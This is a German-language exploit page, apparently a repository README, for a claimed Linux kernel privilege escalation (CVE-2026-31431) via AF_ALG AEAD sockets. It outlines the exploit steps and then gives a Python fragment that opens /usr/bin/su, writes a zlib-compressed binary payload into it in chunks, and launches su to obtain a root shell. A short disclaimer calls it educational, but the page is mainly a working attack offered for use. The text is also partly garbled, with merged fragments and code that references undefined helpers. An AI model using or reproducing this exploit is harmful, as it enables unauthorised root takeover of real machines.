
Lokaler Privilege-Escalation-Exploit für CVE-2026-31431, der die AF_ALG-AEAD-Socket-Verarbeitung missbraucht, um auf verwundbaren Linux-Kerneln Root-Shell-Zugriff zu erlangen.
CVE-2026-31431 ist eine Linux-Privilege-Escalation-Schwachstelle, die die AF_ALG (Kernel-Crypto-API)-Schnittstelle missbraucht. Durch die Erstellung einer bösartigen Interaktion mit AEAD-Sockets (Authenticated Encryption with Associated Data) kann ein Angreifer Privilegien erweitern und Code als Root ausführen.
Diese Schwachstelle nutzt die unsachgemäße Verarbeitung von kryptografischen Socket-Operationen aus, was kontrollierte Speichermanipulation und letztendlich Privilege Escalation ermöglicht.
/usr/bin/su)Der Exploit:
Erstellt einen AF_ALG-Socket
Bindet an:
authenc(hmac(sha256),cbc(aes))
Verwendet manipulierte Payloads über setsockopt und sendmsg
Löst unbeabsichtigtes Kernel-Verhalten aus
Wechselt in eine Root-Shell über:
g.system("su")
Wichtige Indikatoren:
socket(38,5,0) → AF_ALGzlib)
**Haftungsausschluss: Ich besitze dieses PoC nicht. Es dient nur zu Bildungszwecken für Tests in Umgebungen, in denen die Berechtigung verfügbar ist. Der Autor/Eigentümer ist nicht für Missbrauch verantwortlich. **
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")